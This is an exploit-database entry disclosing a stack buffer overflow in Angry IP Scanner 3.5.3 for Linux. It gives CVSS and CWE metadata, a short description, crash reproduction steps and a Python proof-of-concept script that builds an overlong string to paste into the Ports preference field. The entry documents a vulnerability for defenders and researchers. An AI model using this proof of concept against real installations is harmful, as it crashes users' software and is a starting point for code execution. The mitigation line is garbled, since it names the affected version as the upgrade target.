Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)

vendor:

Angry IP Scanner

by:

Mr Winst0n

7.8

CVSS

HIGH

Denial of Service (DoS)

119

CWE

Product Name: Angry IP Scanner

Affected Version From: 3.5.3

Affected Version To: 3.5.3

Patch Exists: YES

Related CWE: N/A

CPE: a:angryziber:angry_ip_scanner

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2018

Angry IP Scanner for Linux 3.5.3 – Denial of Service (PoC)

A buffer overflow vulnerability in Angry IP Scanner for Linux 3.5.3 can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when handling user supplied data. This can be exploited to cause a stack-based buffer overflow via an overly long, specially crafted string passed to the application. Successful exploitation of this vulnerability may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Angry IP Scanner for Linux 3.5.3

Source

Exploit-DB raw data:

# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)

# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
f.write(crash)
f.close()